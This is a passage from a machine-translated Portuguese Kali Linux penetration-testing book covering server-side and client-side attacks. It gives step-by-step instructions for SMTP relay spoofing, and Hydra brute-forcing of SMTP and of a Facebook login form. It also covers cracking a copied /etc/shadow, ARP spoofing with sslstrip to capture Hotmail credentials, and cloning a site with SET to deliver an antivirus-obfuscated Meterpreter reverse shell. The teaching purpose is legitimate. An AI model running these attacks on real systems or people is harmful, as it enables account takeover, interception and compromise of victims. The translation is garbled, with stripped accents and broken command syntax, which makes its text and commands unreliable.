servidores de correio. Se voc no tiver essa informao, voc pode usar o Reconhecimento
tcnicas que aprendemos em Captulo 2, de reconhecimento. Neste exemplo, foi utilizado
feroz para determinar os hosts MX para um domnio particular. Na maioria dos casos, o MX
host o servidor SMTP. A tela a seguir est sendo executado Feroz em
www.cloudcentrics.com:
Primeiro, precisamos ver se o servidor de correio eletrnico vulnervel a comandos diretos. A
principal
finalidade para a qual a maioria dos atacantes querem explorar servidores de correio para
falsificar e-mails
e utilizar o servidor de e-mail como um servidor de retransmisso de e-mail no autorizado. Este
livro vai
cobrir mais sobre como comprometida e-mail servidores podem ser usados para a engenharia
social
ataques em Captulo 4, os ataques do lado do cliente.
Neste exemplo, usaremos Netcat como a ferramenta para se conectar ao servidor de correio. Netcat
um servio de redes de computadores para leitura e gravao para Conexes de rede
usando TCP ou UDP. Netcat projetado para ser um dispositivo confivel "back-end", que
pode ser usado diretamente ou facilmente conduzida por outros programas e scripts. Netcat
tambm
uma depurao e investigao ferramenta de rede rica em recursos com a capacidade de produzir
quase qualquer tipo de correlao usando um nmero de capacidades embutidas.
Um mtodo comum para lanar Netcat est emitindo o comando netcat correio-servidor
port. Neste exemplo, o nosso alvo servidor de correio est em execuo servidores pela porta 25.
Ns
verificado esta informao usando nmap durante os passos de reconhecimento descrito
em Captulo 2, de reconhecimento.
Uma vez que se conectar ao servidor usando Netcat, usamos o HELO comando para informar o
que servidor que somos.
[106]
Captulo 3
Se recebermos uma resposta, podemos manipular a maioria dos servidores usando os comandos
SMTP
(Alguns sistemas podem no ser vulnervel com base na configurao e tipo de sistema). No
seguinte exemplo, comear por dizer ao servidor que estamos usando o HELO comando.
Em seguida, podemos usar o servidor de email para retransmitir mensagens para futuros ataques do
lado do cliente.
HELO,CORREIO DA,Para RCP, E Dados so os nicos campos obrigatrios. Voc pode usar outro
campos para esconder que o e-mail est sendo enviado para e mudar a responder endereo. Uma
exemplo mudando a Responder para tratar com o objetivo de enganar um receptor em
enviando um e-mail para outra pessoa.
A lista completa dos comandos SMTP podem ser encontrados atravs dos comandos SMTP RFC
ou usando o Google.
Ataques de fora bruta
Um ataque de fora bruta quando todas as chaves possveis so verificadas em relao aos dados
criptografados at
a chave correta seja encontrada. Ataques de fora bruta so extremamente caros a partir de um
recurso e
perspectiva de tempo, porque o atacante est explorando vulnerabilidades no criptografia
tirando proveito do comprimento da chave e simplicidade da chave. Uma senha baseado
frequentemente
em palavras de dicionrio ou seja, o espao total de um invasor teria que testar seria
todas as palavras em um dicionrio de correspondncia fazendo o escopo adivinhando
significativamente menor
do que uma senha com caracteres aleatrios. Melhores prticas para reduzir os ataques de fora bruta
est usando chaves longas e complicadas, bem como tempos de espera aps um nmero de
tentativas e
outros mtodos para adicionar mais fatores de segurana.
Hidra
Hidra uma ferramenta desenvolvida pela Escolha do Hacker (THC) que usa a fora bruta
mtodo de ataque para testar contra uma variedade de protocolos diferentes. ideal para atacar
sistemas de e-mail porque Hydra pode direcionar um IP e protocolo especfico, como o administrador
conta para POP3 e SMTP utilizado pelos sistemas de e-mail.
Antes do lanamento de Hydra, voc deve executar Reconnaissance em um alvo, como um
sistema de correio. Captulo 2, o reconhecimento, cobre uma ferramenta de avaliao de
vulnerabilidades Zenmap
que pode ser usado para coletar as seguintes informaes para Hydra:




O endereo IP do alvo (por exemplo, 192.168.1.1)
Portas abertas (por exemplo, a porta 80 ou 25)
Protocol (por exemplo, HTTP para web ou SMTP para o correio)
Nome de usurio (por exemplo, admin)
[107]
Ataques do lado do servidor
Outra ferramenta de reconhecimento que muitas vezes usado com Hydra o plugin do Firefox
Dados adulterao.
Tamper Data uma ferramenta escrita por Adam Judson que permite que um atacante para ver HTTP
e HTTPS GET e POST informaes. Esta informao til ao usar ferramentas
tais como Hydra fora-bruta formulrios da web, pois voc pode automatizar Hydra na abertura
a pgina da Web e testar as diferentes combinaes de nome de usurio e senha.
Uma vez que habilitar o plugin Tamper Data, podemos lanar o plugin e inici-lo
antes de apresentar um nome em um formulrio web.
[108]
Captulo 3
Tamper Data ir exibir as informaes inseridas nos grupos de campo. Os atacantes podem
manipular e reenviar os dados, mesmo que o site criptografado.
Neste exemplo, vemos que o nome de usurio rosa ea senha pinkprincess so
utilizado quando o login boto foi submetido.
Ambos os exemplos so duas maneiras prticas para a realizao de reconhecimento em um alvo
para
reunir as informaes teis Hydra ir precisar. H uma abundncia de outros mtodos
e built-in ferramentas de Kali para coletar informaes na web para usar em Hydra, no entanto, que
recomendar Netcat e Tamper Data como os mtodos mais eficazes.
Agora que completamos nossa fase de reconhecimento, vamos lanar Hydra e
ver como podemos usar nossa informao Reconnaissance para realizar uma fora bruta
ataque de senha.
Para acessar Hydra do Kali, ir para Ataques senha |Ataques online e selecione
Hydra. Isto ir abrir uma Terminal janela que ir executar automaticamente, Hydra.
[109]
Ataques do lado do servidor
A documentao de abertura explica como executar Hydra. Por exemplo, se voc quiser
para atacar arquivo de senhas de uma conta de administrador localizado na 192.168.1.1 usando
SMTP,
voc dever digitar:
hidra-l admin-p / root / password.txt 192.168.1.1 smtp
Se voc gostaria de usar Hydra em um formulrio web, teremos de reunir o
informaes foram coletadas a partir do plug-in de dados adulterao. A sintaxe para usar Hydra
em um formulrio web <url>: <form parameters>: <failure cadeia>.
URL = https://www.facebook.com/login.php?login_attempt=1email=pink&passw
d = pinkprincessl & login = "log in"
Voc pode ento executar Hydra. Voc ter de fornecer um arquivo que contm uma lista de
nomes de usurio e um arquivo que contm as senhas.
hidra-L / cloudcentrics / usernamelist-P / cloudcentrics / passwords_demo_
file.txtt-facebook.com http-get-forma "login.php login_attempt = 1: nome de usurio
= ^ ^ & EMAIL TOKEN = ^ ^ & SENHA login = Login: incorreto "
A sintaxe pode ser complicado e mudar de site para site. Isto pode acontecer no
mesmo site tambm. recomendado para dominar Tamper Data e Hydra em um laboratrio antes
para apresentar ao vivo Teste de Invaso.
DirBuster
DirBuster projetado para diretrios e nomes de arquivos de fora bruta contra aplicaes web
servidores. comum que os servidores web apresentam-se como uma instalao padro
estaduais, no entanto aplicaes e pginas so realmente escondido dentro. DirBuster
projetado para procurar esses fatores escondidos.
DirBuster pode ser encontrado em Aplicaes Web |Crawlers Web como dirbuster. Uma vez
abriu, h campos que devem ser preenchidos antes de iniciar um ataque. No
menos importante, voc deve digitar uma URL de destino, selecione o nmero de threads (sugerimos
estourar o limite
isso a 100), ea lista de arquivos. Voc pode clicar em Procurar e selecionar a lista padro
ou desenvolver o seu prprio.
[110]
Captulo 3
Note-se que algumas verses de Kali no pode incluir os dicionrios padro.
Voc pode baixar os dicionrios padro on-line e apontar para DirBuster
los como mostrado no exemplo a seguir:
Depois de preencher as informaes bsicas, clique em Comeo e DirBuster ir iniciar o
avaliao de vulnerabilidade. Muito provavelmente, ele vai afirmar que o tempo de concluso um
pouco
dias, no entanto, normalmente voc vai encontrar informaes teis dentro de minutos. A
sequncia
Screenshot identifica um / Cgi-bin / pasta, que poderia ser interessante:
[111]
Ataques do lado do servidor
Qualquer cdigo que no seja 404 est aberta a fora bruta. Para direcionar o / CBI-bin / dobrador
encontrado durante a pesquisa, clique em Pare para acabar com a digitalizao e clique em Voltar. Na
pgina
painel, acima Comece, um campo para a escolha do ponto de partida a vulnerabilidade
avaliao. Para iniciar o interior do / CBI-bin / pasta, coloque o texto nesse campo e clique
em Iniciar.
Provavelmente, voc vai encontrar mais pastas dentro de pastas para avaliar. Continue o
mesmo processo de parar, atualizar o campo de incio e execuo de exames para mapear
o seu alvo. A figura a seguir mostra uma rvore de mapeamento para o
cgi-bin pasta:
[112]
Captulo 3
Voc pode clicar no Relatrio boto para gerar um relatrio de suas descobertas. Voc precisa
escolha onde deseja salvar o relatrio e clique em Gerar relatrio. Um arquivo de texto ir aparecer
mostrando o que foi encontrado.
WebSlayer
WebSlayer uma ferramenta de fora bruta aplicao web. WebSlayer pode ser utilizado para-
bruta
forar o Form (usurio / senha),GET, E POST parmetros. WebSlayer tambm pode
ser usado para identificar os recursos no vinculados, como scripts, arquivos, diretrios e assim por
diante.
WebSlayer tem um gerador de carga e os resultados do analisador.
[113]
Ataques do lado do servidor
No Configurao de Ataque separador existe uma url campo, que deve ser preenchido com o
objectivo
URI. Abaixo do campo de URL so o Cabealhos e POST campos de entrada de dados. Tem
uma opo para definir o tipo de carga, que pode ser Dicionrio,AlcanceOu Carga paga.
O Dicionrio pode ser um arquivo contendo cargas, o que pode ser um arquivo personalizado
ou selecionados de uma lista de dicionrios disponveis. O Alcance configurao pode ser usada
para
especificar o intervalo para o ataque. O Carga paga configurao pode importar uma carga til do
Gerador Payload guia. A figura a seguir mostra WebSlayer alvo www.
thesecurityblogger.com:
O gerador de carga til uma ferramenta que voc pode usar para criar cargas feitas sob
encomenda. Voc
pode carregar dicionrios, intervalos numricos, blocos de caracteres, permutaes, cartes de
crdito,
nomes de usurio e outras configuraes. Voc pode concatenar e criar uma carga final que
podem ser enviados para o guia de ataque para um ataque personalizado.
Um exemplo da definio de uma carga na gama Gerador Payload guia pode ser visto
na imagem seguinte. O exemplo mostra a configurao da carga da gama 0para
1000. Uma vez que o intervalo selecionado, clicamos no adicionar gerador boto, que ser
gerar um gerador temporal. Arraste o gerador recm-criado para a Carga paga
Criador na parte inferior e clique em Gerar Payload. Agora podemos importar o novo
carga no Configurao de Ataque guia.
[114]
Captulo 3
Depois de importar o payload para o cenrio de ataque ou selecionando dicionrios padro,
voc deve selecionar onde a carga ser injetado por WebSlayer. Colocar a palavra-chave
FUZZ no URL ser atacado faz isso. Por exemplo, a tela a seguir
mostra o alvo http://www.thesecurityblogger.com/FUZZ no campo URI ataque
onde FUZZ um ataque aproveitando dois dicionrios existentes encontrados em WebSlayer:
[115]
Ataques do lado do servidor
WebSlayer pode atacar qualquer parte do pedido HTTP como cabealhos e
autenticao. Para WebSlayer a fora-bruta a senha de um web
servidor, importante conhecer o nome de usurio ou, mais provavelmente no vai WebSlayer
trabalho. Voc ter que capturar solicitaes HTTP e tentar um login para que voc
pode pegar o agente de usurio e contedo necessrio para o ataque.
Firefox oferece um plugin chamado Viva cabealhos HTTP, que voc pode usar para reunir esta
informaes durante a tentativa de um login para o servidor de destino. O exemplo a seguir
mostra de usurio joeymuniz usando uma senha incorreta durante a captura de pacotes com ao vivo
Cabealhos HTTP.
[116]
Captulo 3
As partes importantes de informaes capturadas a partir do Live HTTP Headers
utilizado em WebSlayer so o User-Agent e Dados de Acesso como mostrado na
seguinte exemplos:
As informaes do agente de usurio iria na seo de cabealhos e informaes de login
iria na seo de dados de postagem. A URL deve corresponder pgina de login. O
Autenticao seo apresenta diferentes nveis de segurana e um espao para
o nome de usurio.
[117]
Ataques do lado do servidor
O exemplo a seguir mostra a tomar as informaes de login capturados em HTTP ao vivo
Cabealhos durante a tentativa de acesso myspace. A senha errada comutada para
a palavra-chave FUZZ para que WebSlayer sabe onde para tentar a fora bruta. O
Autenticao guia tem diferentes opes de segurana para o exemplo, a autenticao
est definido como bsico com o nome de usurio joeymuniz seguido por uma palavra-chave FUZZ.
Voc basicamente de entrada do site, agente de usurio, contedo e nome de usurio conhecido.
Voc
adicionar a palavra-chave FUZZ onde as senhas so necessrias e selecione um dicionrio para
brute-force esses espaos de login. Esta uma maneira fcil de automatizar a fora bruta contra
um servidor web.
myspace usa a autenticao mais forte do que o exemplo fornecido.
Alvos com recursos de segurana como bloqueio da conta, provavelmente, no ser
vulnerveis a esta ferramenta. Ferramentas de segurana avanadas, como a tecnologia IPS / IDS
faria
provavelmente ser alertado se o seu alvo fosse um bem monitorado. Por estas razes, ns
cautela contra o uso de WebSlayer em alvos vivos sem fazer Reconnaissance adequada.
[118]
Captulo 3
WebSlayer oferece a capacidade de exportar cargas e descobertas no texto e HTML
formatos. O arquivo de log tambm pode ser capturado e colado em um arquivo de texto.
Cracking senhas
As senhas so os usurios mais comuns de mtodos de autenticao para verificar sistemas. Ele
comum identificar senhas que podem acessar outros sistemas, enquanto explorando uma
sistema de destino. Captulo 4, os ataques do lado do cliente, fornece uma seco dedicada a
rachaduras
senhas com muitas ferramentas disponveis na Kali. A prxima seo ir abordar
rachaduras senhas apresentando uma ferramenta muito popular disponvel em Kali.
John the Ripper
John the Ripper o cracker de senha mais popular que usado hoje. Tem
vrios mecanismos que permitem quebrar diferentes tipos de senhas, incluindo criptografada
e senhas hash. John the Ripper tem a capacidade de detectar automaticamente a maioria dos hashes
e
senhas criptografadas tornando o processo mais fcil para os testadores de penetrao. Atacantes
Como a ferramenta, porque muito configurvel e pode ser configurado numa variedade de
diferentes maneiras de acelerar quebra de senha.
[119]
Ataques do lado do servidor
John the Ripper funciona da seguinte maneira:






As tentativas de cracking de senhas com palavras de dicionrio
Usa dicionrio palavras com caracteres alfanumricos anexos
e prefixado
Coloca dicionrio palavras juntas
Adiciona caracteres alfanumricos para combinar palavras
Executa palavras de dicionrio com caracteres especiais misturados
Quando tudo mais falhar, as tentativas de fora
bruta
A melhor prtica atualizar o dicionrio padro. Encontramos a lista de palavras padro
limitado (cerca de 3.115 palavras) e, em muitos casos no vai quebrar senhas comuns.
Voc pode encontrar dicionrios atravs de pesquisa Google. Para verificar o tamanho de uma nova
lista de palavras,
abra um terminal e emitir o contagem de palavras comando, uma vez que o arquivo carregado para o
pasta ativa. Esse comando wc -1 FILENAME.
comum ter palavras duplicadas quando o download e combinando mltiplas
palavras listas da Internet. recomendado para remover duplicatas, bem como qualquer
maisculas letras desde John alterna estilos do caso automaticamente. Um exemplo do
comando para remover palavras em maisculas :
tr A-Z a-z <CustomWordFile> AllLowerCaseFile
Um exemplo do comando para remover duplicatas :
sort-u AllLowerCaseFile> NoDuplicatesOrUpperCase
Verifique a nova contagem de palavras, emitindo o contagem de palavras comando no seu novo
arquivo:
wc -1 NoDuplicatesOrUpperCase
Para abrir o John the Ripper em Kali, ir ao abrigo Ataques senha |Ataques offline e
selecionar John. Um terminal de linha de comando ser aberta.
Johnny um GUI para John the Ripper. Johnny coberto em Captulo 4,
Ataques do lado do cliente.
Voc pode avaliar a velocidade de Joo Ripper, digitando john-test para obter uma
idia de quo rpido ele ser executado.
[120]
Captulo 3
Para usar um arquivo de texto personalizado, como o que se construiu no exemplo anterior
chamado
NoDuplicatesOrUpperCase, Voc vai precisar para editar a lista de palavras padro. Isto pode ser
encontrado editando o arquivo john.conf sob o padro John the Ripper pasta. Em
Nesse arquivo, voc vai encontrar a lista de palavras que aponta para um padro passwords.lst.
Alterar a lista de arquivos para o nome do seu novo arquivo de lista de palavras. Seguindo o anterior
exemplo, voc poderia alter-lo para Wordlist = NoDuplicatesOrUpperCase.lst. O
novo arquivo de lista de palavras deve estar na pasta especificada no john.conf arquivo. O padro
listado sob o $ JOHN diretrio.
Para usar o John the Ripper em um arquivo de senhas, primeiro voc precisa copiar o arquivo de
destino
ao Banheiro diretrio. Emita o comando de cpia cp para mover o arquivo para a Banheiro
diretrio. Por exemplo, para copiar um arquivo shadow (um arquivo de senha comum encontrado
em
Sistemas Linux) tipo cp / etc / shadow.
Uma vez que o arquivo est no mesmo diretrio que o John the Ripper, emita o comando banheiro
eo nome do arquivo. Assim, para executar John the Ripper em um arquivo sombra, tipo john
sombra.
Voc pode verificar o andamento de John the Ripper, premindo Enter, que ir mostrar
a senha atual que est sendo imaginado, bem como as rachaduras por segundo listado como c / s.
Voc pode pausar John the Ripper, premindo CTRL e Cchaves juntas. Se voc reiniciar
John emitindo john IMAGEM, Ele vai continuar de onde parou a ltima vez que o arquivo.
Para ver os resultados, uma vez Joo, os acabamentos do Estripador, tipo john-show IMAGEM. Ento,
para ver o
resultados do arquivo de sombra, tipo john-show sombra.
Voc pode encontrar mais informaes sobre John the Ripper, como outros comandos no
http://www.openwall.com/.
Man-in-the-middle
Um ataque man-in-the-middle, por definio padro uma forma de escuta ativa
por ter um atacante fazer conexes independentes com as vtimas. A maioria
forma comum de ataques man-in-the-middle esto entre sistemas host. No muito
H pouco tempo, uma vulnerabilidade foi encontrada que abusaram do sistema que move as pessoas
a partir de
inseguro para proteger pginas web. Isto d atacantes a capacidade de espionar usurios
conexo para proteger servidores web. A prxima seo ir cobrir essa vulnerabilidade.
Os ataques comuns man-in-the-middle sero abordados nos prximos captulos deste livro.
[121]
Ataques do lado do servidor
Tira SSL
Em 2009, o pesquisador de segurana Moxie Marlinspike em DefCon lanado tira SSL. Ele
introduziu o conceito de despojamento SSL, um ataque man-in-the-middle, em que um
proxies HTTPS atacante rede solicita do usurio, em vez de enviar o trfego
atravs do protocolo HTTP, o qual pode ser interceptado e manipulado. Tira SSL automatiza o ataque
e permite que algum interceptar o trfego destinado a um site seguro. O HTTP
estrita especificao de segurana de transporte foi posteriormente desenvolvido para combater estes
ataques, no entanto, a implantao de HSTS tem sido lento, e os ataques de decapagem SSL so
ainda amplamente utilizado hoje.
Para os fins desta seo, s estar usando uma nica interface, no entanto,
sua mquina virtual pode ser configurada com mltiplas interfaces Ethernet. Ns
ter que verificar se h vrias (virtuais) interfaces Ethernet habilitados.
No canto superior esquerdo da rea de trabalho, clique no Xterm link para abrir
um terminal de comando. Uso ifconfig para determinar o que so interfaces no
mquina virtual.
O comando ifconfig | grep "eth". Este comando ir filtrar-out todo o
as interfaces diversas e apenas nos mostrar as interfaces Ethernet, conforme segue:
Se tivermos mais de uma interface habilitada, emitir o comando ifdown com a
interagir nome para desativ-lo. Por exemplo, existem interfaces nomeada eth0 e eth1,
emitir o comando Ifdown eth0 para desativar o eth0 interface. Voc vai desativar seu
interface no-ativo.
[122]
Captulo 3
A fim de executar o man-in-the-middle (MITM) ataque tira SSL, voc precisa de dois
peas de informao. Em primeiro lugar, necessrio o endereo IP do alvo. Em segundo lugar,
voc
necessrio o endereo IP do roteador que atua como gateway de sub-rede. Uma vez que este
ataque
mtodo s eficaz a partir da mesma camada 2 segmentos como o alvo, iremos
preciso verificar o nosso prprio gateway padro. Para fazer isso, vamos precisar de utilizar
o terminal de comando, uma vez mais.
Em sua edio sesso de terminal o seguinte comando:
route-n
Ou o comando filtrada shell route-n | grep 'UG' | awk '{print $ 2}' vontade
retornar apenas o gateway padro.
Iniciando o ataque - redirecionamento
Antes que possamos comear a coletar informaes, tais como as credenciais do usurio de sesses
SSL,
precisamos obter algumas tarefas realizadas. Precisamos comear as instalaes que nos permitem
para redirecionar o trfego da rede. Alm disso, precisamos redirecionar o trfego capturado por
nosso
atacando hospedeiro para que possamos encaminhar os pacotes de usurios para tira SSL. Para
fazer isso, ns
precisa habilitar o encaminhamento de IP em Iptables e Arpspoof.
[123]
Ataques do lado do servidor
As prximas trs etapas ir configurar o encaminhamento de IP, redirecionamento
arpspoof,
e configurar o redirecionamento de porta. Estes comandos so todos executados a partir
de
terminal de linha de comando. Habilitando IP Forwarding:
echo 1> / proc/sys/net/ipv4/ip_forward
Para os fins deste exemplo, vamos precisar de saber o IP do / host alvo vtima
endereo. Isso para evitar contendas e ARP endereo inundaes a toda a rede
por todos os exrcitos de ataque. Em um cenrio de ataque real, ela pode ser ideal para executar
arpspoof
contra todo o segmento da camada 2 (este o padro, se IP da vtima omitido)
e / ou utilizar o pacote de captura e cheirar, a fim de determinar a vtima IP.
Em um ambiente com muitos hosts isso pode fazer com que o fluxo de trfego para diminuir e
pr em causa a capacidade do atacante de permanecer despercebido. O comando :
arpspoof-i eth0-t victimip default_gateway_ip
Recomenda-se que voc no enviar esse processo para o fundo e deixar
a janela para cima. Basta comear uma nova sesso de terminal.
Configurando o redirecionamento de porta usando o
Iptables Isso permite que o atacante para pegar o trfego destinado a um servidor HTTP sobre TCP 80 e
redirecionar para a porta de escuta tira SSL. Neste exemplo, o redireccionamento ser em TCP
10000 tanto para destino porta e redirecionar destino. O atacante pode usar qualquer
valor aplicvel. O destino redirecionamento escolhido tambm deve ser utilizado para a criao
a porta de escuta para tira SSL. O comando a seguinte:
iptables-t nat-A PREROUTING-p tcp - destination-port 80-j REDIRECT
-Aos portos 10000 -
[124]
Captulo 3
Para desativar o PREROUTING regra, substitua o -A com -D para limpar toda a tabela
regras usar.
iptables-t nat-F # para lavar
iptables-t nat-L # para verificar
arpspoof tem muitas opes. Voc pode usar o comando man iptables
ver opes adicionais.
Agora voc deve ser definido e pronto para iniciar a captura usando SSL tira!
Lanamento sslstrip e da janela de linha de comando recm-inaugurado, execute o
comando a seguir para iniciar o SSL tira escuta em 10000 TCP port:
sslstrip-l 10000
[125]
Ataques do lado do servidor
A partir do host de destino, procure um servio de correio online, como
https://www.hotmail.com e log in
Usando o menu de atalho do aplicativo para o Sslstrip diretrio, abra outra
Terminal janela e digite o seguinte comando:
Isso agora deve mostrar-lhe os resultados do SSL tira ataque.
[126]
Captulo 3
Note-se que o nome de usurio e senha foram obscurecidas no
exemplo a seguir, mas devem aparecer de forma clara e em sua tela.
Resumo
Este captulo explica vrios mtodos de comprometer servidores web vulnerveis
utilizando ferramentas disponveis no Kali. Os mtodos mais comuns esto identificando
conhecido
vulnerabilidades com ferramentas automatizadas e explorar o melhor caminho possvel para
acesso ao sistema de destino.
O captulo comeou com foco em vrias ferramentas utilizadas para identificar vulnerabilidades.
O prximo tema abordado foi ferramentas utilizadas para explorar vulnerabilidades encontradas em
comum
servidores, bem como os servidores que hospedam os servios de e-mail. Em seguida, ns nos
concentramos em bruto-forando
ferramentas que poderiam acessar dados de sistemas que no so vulnerveis a ataques
conhecidos.
Conclumos abordando quebra de senha e ataques man-in-the-middle;
no entanto, estes assuntos tm dedicado sees em captulos posteriores.
O prximo captulo vai se concentrar em identificar e explorar vulnerabilidades encontradas
em sistemas hospedeiros, tambm conhecidos como dispositivos de cliente.
[127]
Ataques do lado do
cliente
O termo cliente ou host significa um ponto final usado para conectar a uma rede, tal como um
computador, um tablet, ou um dispositivo mvel. Um cliente pode oferecer informaes, servios e
aplicaes para outros clientes ou obter informaes de outro sistema, como um
servidor. Normalmente, o cliente termo refere-se a terminais utilizados por pessoas. Ter pessoas
envolvido abre um leque de possveis vulnerabilidades.
Ataques do lado do cliente, no que se refere a aplicaes web, visto como um mtodo para
identificar quem est ligando para aplicaes web, o que vulnerabilidades existem naqueles
sistemas, e se esses sistemas pode ser um meio para obter acesso ou informaes
a partir de uma aplicao web. O foco deste captulo ser a identificao de sistemas
acesso a aplicaes web, avaliao de sistemas de vulnerabilidades, e explorando
essas vulnerabilidades, se possvel. Este captulo vai incidir fortemente sobre comprometer
senhas, pois eles so os mtodos mais comuns utilizados para proteger os sistemas de
acolhimento.
Este captulo ir kick-off, cobrindo como atacar anfitries usando engenharia social.
Mais tarde, veremos como identificar vulnerabilidades em sistemas host para que voc possa
explorar essas vulnerabilidades usando ferramentas cobertas em outras sees deste livro. Ns
concluir com atacando senhas, porque eles so os meios mais comuns
para proteger os sistemas host.
A engenharia social
Os seres humanos sempre sero seus elos mais fracos para a postura de segurana de um alvo.
O
mais voc tenta controlar os usurios finais, mais eles vo tentar polticas de bypass.
Quanto menos os controles que voc colocou no lugar, a menos provvel que as polticas sero
seguidas.
Isso cria uma espada de dois gumes ao decidir como proteger os usurios finais
ameaas cibernticas. Hackers sabem disso e direcionar os usurios finais de vrias maneiras que
se concentram
em comprometer uma caracterstica-chave do usurio mdio, que confiana.
Ataques do lado do cliente
A engenharia social a arte de manipular as pessoas para a execuo de aes de
divulgao de informaes. Muitos ataques do lado do cliente so baseadas em enganar um
usurio final
em expor seus sistemas para um ataque. A engenharia social pode variar de chamar
algum fingindo ser um funcionrio autorizado a postar um link em
Facebook que afirma ser um servio, enquanto realmente ser um meio para comprometer
o cliente.
Melhores prticas para o lanamento de um bem-sucedido ataque de engenharia social tomar o
tempo
para compreender o seu alvo; significado aprender como os usurios se comunicam e tentativa
se misturar em seu ambiente. A maioria dos ataques de engenharia social que no tendem a ser
escrito em um formato genrico, e eles no incluem um gancho forte para atrair a vtima,
como um mal escrito e-mail dizendo que o usurio tem o direito de fundos no reclamados.
O uso de fontes de mdia social como o Facebook uma tima maneira de aprender sobre um alvo,
como o que passatempos e padres de fala como alvo favor. Por exemplo, o desenvolvimento
armadilhas com base em esportes bilhetes com desconto seria ideal se um perfil no Facebook de um
alvo coberta com os logotipos da equipe de esportes.
Porque a maioria dos ataques do lado do cliente alavancar a engenharia social, a prxima seo
ir
explorar um popular arsenal engenharia social disponvel em Kali.
Engenharia Social Toolkit (SET)
O Engenheiro social Toolkit (SET) foi criado e escrito pelo fundador da
TrustedSec. uma ferramenta orientada para Python open-source que visa Teste de Invaso
usando engenharia social. SET uma ferramenta extremamente popular usado por segurana
profissionais para testar a postura de segurana de uma organizao. Atacantes da vida real usar
SET
para criar ataques ativos e maliciosos. a ferramenta de escolha para o mais comum
ataques de engenharia social.
Para iniciar o jogo, v para o seguinte link da barra de menus Ferramentas de Explorao |Social
Ferramentas de engenharia, e selecione se-toolkit.
A primeira vez que voc iniciar SET em Kali, SET exibir as atualizaes de distribuio SET
directamente a partir de GitHub. Voc ser presenteado com a opo de receber atualizaes
automaticamente. Selecionar sim para receber atualizaes automticas.
[130]
Captulo 4
SET ir pedir-lhe para verificar se git instalado. Kali vem com git pr-carregado;
no entanto, a melhor prtica seguindo os passos em Captulo 1, Teste de Invaso e
Instalao, atualizar Kali. Atualizaes ir incluir uma verso do git necessrio para comear a
trabalhar.
O Kali 1.0 no inclui o . Git diretrio. Para atualizar, voc deve seguir o
os seguintes passos:
1. Abra um terminal e navegue at cd / usr / share.
2. Faa o backup do antigo conjunto diretrio digitando mv definir Backup.Set.
3. Re-Download SET do GitHub usando o seguinte comando:
git clone https://github.com/trustedsec/social-engineer-toolkit/
set /
4. Salvage o velho configurao arquivo para evitar ter que definir o caminho do MSF
usando:
cp Backup.Set / config / set_config set / config / set_config
[131]
Ataques do lado do cliente
5. Verifique que as obras definidas usando o comando se-kit de ferramentas.
Agora que voc entende algumas das dinmicas bsicas de como funciona a SET, vamos
comprometer uma mquina cliente usando um site que pode confiar. Apesar de que podemos
usar qualquer site, recomendamos algo que simples.
Aqui est um exemplo de clonar um corporativa SharePoint local com a inteno de
explorando a vtima por um carregamento meterpreter. Na realidade, pode ser qualquer site que voc
quer comprometer. Ns escolhemos um site do SharePoint, pois como um verificador da penetrao
voc
provavelmente vai querer usar um alvo que vai atingir o seu objetivo. Muitos atacantes para
propsitos nefastos podem usar um site pblico para clonar.
Usando SET para clonar e ataque
[132]
Captulo 4
O prximo passo lanar SET, indo para Ferramentas de Explorao |Engenharia Social
Toolkit |se-toolkit.
Depois que voc aceita todas as licenas e termos de servios, voc ver a tela principal
para SET.
[133]
Ataques do lado do cliente
Recomenda-se selecionar o 5) Atualize o Toolkit social-Engenheiro opo anterior
ao uso de SET. Uma vez atualizado, selecione a opo 1) Os ataques de engenharia social-. O
imagem seguinte mostra os diferentes vetores de ataque website disponvel sob Social-
Ataques de engenharia em SET. A opo de spear phishing uma oferta de ataque populares
a capacidade de incorporar os ataques em e-mails e PDFs. O ataque de phishing lana envia
o ataque arquivos atravs de um falso e-mail originada pela vtima diretamente da SET.
Para este exemplo, vamos selecionar Vetores de Ataque Website, porque anteriormente
clonado um site por um ataque baseado na Web site. Em seguida, precisamos determinar como
entregar a carga. Existem vrias opes disponveis. Escolha o Java Applet
Attack, que normalmente opo 1.
[134]
Captulo 4
SET vai perguntar se voc gostaria de usar um modelo existente que vem com o SET, ou
se voc gostaria de clonar um site. Os modelos padro no so boas, e
recomendado para clonar um site, como o exemplo do SharePoint fornecida anteriormente.
Na prxima tela, SET vai apresentar vrias opes de como o usurio pode copiar
o site. Neste exemplo, usaremos a opo local-Cloner. Selecione local-Cloner,
SET e ir fornecer uma srie de perguntas. Estas questes iro orient-lo atravs
clonar um site e ter que correr de Kali. Site-Cloner ir solicitar o seguinte:
NAT / Port Forwarding: Esta opo tende a confundir as pessoas. SET est pedindo
se as vtimas ir se conectar a sua mquina usando o endereo IP configurado
em seu servidor de Kali ou se as vtimas ir se conectar a um endereo IP diferente
(Como um endereo NAT). Isso realmente entra em jogo quando voc est atacando
pessoas fora da sua rede ou na Internet. Selecionar sim se voc est atacando
vtimas fora da sua rede. Tipo no se voc est atacando vtimas no
mesma rede, tal como um laboratrio interno.
[135]
Ataques do lado do cliente
Endereo IP / nome de host para conexo reversa: Quando SET oferece sua carga
vtima, SET precisa dizer a vtima como ligar de volta para Kali. Numa
ambiente de laboratrio, voc pode digitar o endereo IP do seu servidor de Kali.
URL que voc deseja clonar: Este o site que voc est copiando.
Exploit para entregar: SET vai usar o Metasploit estrutura para proporcionar o
explorar. A opo mais popular o O Windows Reverse_TCP Meterpreter.
O do Windows Reverse_TCP Meterpreter funciona por ter uma vtima executar um
executvel que estabelece uma porta aberta para um atacante para ligar de volta
atravs de obter acesso shell completo para PC da vtima. A figura a seguir
mostra as cargas disponveis. Windows Reverse_TCP Meterpreter o
segunda opo na lista.
Voc pode importar seu prprio executvel. Esta geralmente usada pelos
atacantes ou outras pessoas escrevendo suas prprias ferramentas / malwares.


SET vai pedir para selecionar o tipo de tcnica de ofuscao anti-vrus que voc gostaria
para usar. SET exibir uma classificao ao lado de cada tcnica. Selecione uma opo bem cotado,
a menos que voc deseja uma opo especfica. A figura a seguir mostra o disponvel
opes. Ns vamos com opo 16, porque tem a melhor classificao.
[136]
Captulo 4
SET vai perguntar qual a porta ouvinte deve ser usado. Na maioria dos casos, ficar com o padro
portos. Aps a ltima pergunta respondida, SET far com que o site clonado.
O novo stio clonado pode ser usado como um meio para comprometer alvos. Voc precisa
para enganar os usurios para acessar o site clonado utilizando um navegador de Internet. O
utilizador
acessando o site clonado vai ter um Java pop-up, que se for executado, ir fornecer uma
Reserve_TCP Meterpreter ao seu servidor de Kali. O atacante pode iniciar um meterpreter
sesso e ter privilgios de administrador completos no dispositivo acessando o site clonado.
[137]
Ataques do lado do cliente
